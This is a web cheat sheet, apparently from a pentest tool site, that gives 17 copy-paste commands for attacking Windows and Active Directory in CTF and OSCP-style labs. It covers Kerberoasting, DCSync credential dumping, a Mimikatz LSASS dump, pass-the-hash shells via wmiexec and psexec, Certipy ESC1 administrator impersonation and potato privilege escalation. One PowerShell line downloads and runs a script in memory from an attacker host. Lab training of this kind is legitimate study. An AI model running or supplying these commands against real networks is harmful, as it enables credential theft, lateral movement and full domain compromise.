ZeroBox

Windows & Active Directory cheatsheet

17 copy-paste commands for windows & active directory in CTFs and OSCP-style labs. Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.

SharpHound AD Collector Execution

Collect all Active Directory objects, trusts, ACLs, and sessions into zip archive.

.\SharpHound.exe -c All,GPOLocalGroup --zipfilename htb_ad.zip

bloodhoundsharphoundadcollector

PowerView Domain & User Recon

Import PowerView and list domain controllers, domain users, and admin groups.

powershell -ep bypass
Import-Module .\PowerView.ps1
Get-DomainUser -SPN | select samaccountname,serviceprincipalname
Get-DomainGroupMember -Identity "Domain Admins"

powerviewactive-directorykerberoasting

Impacket GetUserSPNs (Kerberoasting)

Request Kerberos TGS tickets for accounts with SPNs and output format for Hashcat / John.

impacket-GetUserSPNs {DOMAIN}/{USER}:{PASSWORD} -dc-ip {TARGET_IP} -request -outputfile hashes.kerberoast

impacketkerberoastspntgs

Impacket SecretsDump (NTDS.dit & SAM Dumps)

DCSync entire domain credentials directly over RPC using domain admin account.

impacket-secretsdump {DOMAIN}/{USER}:{PASSWORD}@{TARGET_IP} -just-dc-ntlm

impacketsecretsdumpdcsyncntds

Evil-WinRM Remote PowerShell Access

Connect to Windows target over WinRM port 5985 with credentials or Pass-The-Hash.

evil-winrm -i {TARGET_IP} -u {USER} -p "{PASSWORD}" -s /opt/scripts

evil-winrmwinrmshellpth

NetExec / CrackMapExec Domain Sweep

Check SMB credentials validity, local admin status (Pwn3d!), and password policies.

nxc smb {TARGET_IP} -u {USER} -p "{PASSWORD}" --shares

netexeccmesmbshares

Mimikatz LogonPasswords LSASS Dump

Dump plaintext passwords and NTLM hashes from memory of LSASS process.

privilege::debug
sekurlsa::logonpasswords
lsadump::sam
lsadump::lsa /patch

mimikatzlsasshashesprivesc

Impacket GetNPUsers (AS-REP Roasting)

Query users with DONT_REQ_PREAUTH set to retrieve crackable Kerberos AS-REP hashes without creds.

impacket-GetNPUsers {DOMAIN}/ -usersfile users.txt -dc-ip {TARGET_IP} -format hashcat -outputfile asreproast.hashes

impacketasrepkerberosactive-directory

Certipy AD CS Vulnerable Template Enumeration

Find vulnerable Active Directory Certificate Services templates (ESC1-ESC13).

certipy find -u {USER}@{DOMAIN} -p "{PASSWORD}" -dc-ip {TARGET_IP} -vulnerable -stdout

certipyadcscertificatesactive-directory

Certipy ESC1 Administrator Impersonation

Request certificate as Administrator using vulnerable ESC1 template allowing SAN specification.

certipy req -u {USER}@{DOMAIN} -p "{PASSWORD}" -dc-ip {TARGET_IP} -ca {CA_NAME} -template ESC1_Template -upn Administrator@{DOMAIN}

certipyesc1impersonationactive-directory

Impacket WMIExec (Pass-The-Hash)

Execute semi-interactive commands over WMI using NTLM hash without knowing plaintext password.

impacket-wmiexec -hashes :{NTLM_HASH} {USER}@{TARGET_IP}

impacketwmiexecpthlateral-movement

Impacket PSExec (Pass-The-Hash as SYSTEM)

Spawn SYSTEM service shell on target using NTLM hash over SMB port 445.

impacket-psexec -hashes :{NTLM_HASH} Administrator@{TARGET_IP}

impacketpsexecpthwindows

WinPEAS In-Memory Download & Execute

Execute WinPEAS privilege escalation scanner directly in memory via WebClient.

powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://{LHOST}:8000/winPEAS.ps1')"

winpeasprivescpowershellwindows

AlwaysInstallElevated Registry Query

Verify if MSI packages run with elevated SYSTEM permissions via registry keys.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated & reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

alwaysinstallelevatedmsiprivescwindows

Unquoted Service Path Enumeration

Detect auto-starting Windows services with unquoted executable paths containing spaces.

wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

unquoted-servicewmicprivescwindows

GodPotato SeImpersonatePrivilege Exploit

Abuse SeImpersonatePrivilege on Windows Server 2012-2022 via DCOM/RPC reflection.

GodPotato-NET4.exe -cmd "cmd.exe /c whoami"

godpotatoseimpersonatepotatoprivesc

PrintSpoofer SeImpersonate / Named Pipe Exploit

Elevate from service account to SYSTEM via print spooler named pipe reflection.

PrintSpoofer64.exe -i -c cmd

printspooferseimpersonatenamed-pipeprivesc

Use these commands with your values filled in. ZeroBox interpolates target IP, domain and credentials into every command. Open the cheatsheet

More cheatsheets